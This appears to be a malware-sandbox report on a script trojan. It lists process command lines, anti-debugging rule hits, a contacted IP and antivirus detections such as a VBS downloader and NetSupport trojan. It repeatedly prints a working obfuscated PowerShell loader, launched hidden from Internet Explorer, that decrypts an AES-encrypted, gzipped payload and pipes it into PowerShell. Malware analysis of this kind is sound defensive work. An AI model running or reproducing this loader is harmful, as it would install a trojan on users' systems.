[System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf | powershell - } |
cmdline | "C:\Windows\system32\cmd.exe" /c powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf | powershell - |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3060 CREDAT:145409 |
host | 117.18.232.200 |
ALYac | VBS:Electryon.308 |
Cyren | VBS/Agent.BCE |
Symantec | ISB.Downloader!gen63 |
ESET-NOD32 | VBS/Agent.QVZ |
Kaspersky | HEUR:Trojan.Script.Generic |
BitDefender | VBS:Electryon.308 |
MicroWorld-eScan | VBS:Electryon.308 |
Emsisoft | VBS:Electryon.308 (B) |
VIPRE | VBS:Electryon.308 |
FireEye | VBS:Electryon.308 |
GData | VBS:Electryon.308 |
Gridinsoft | Trojan.U.NetSupport.bot |
Arcabit | VBS:Electryon.308 |
Detected | |
MAX | malware (ai score=89) |
Tencent | Script.Trojan.Generic.Qzfl |
Fortinet | VBS/Agent.QVZ!tr |
parent_process | iexplore.exe | martian_process | powershell.exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $YmgBp = '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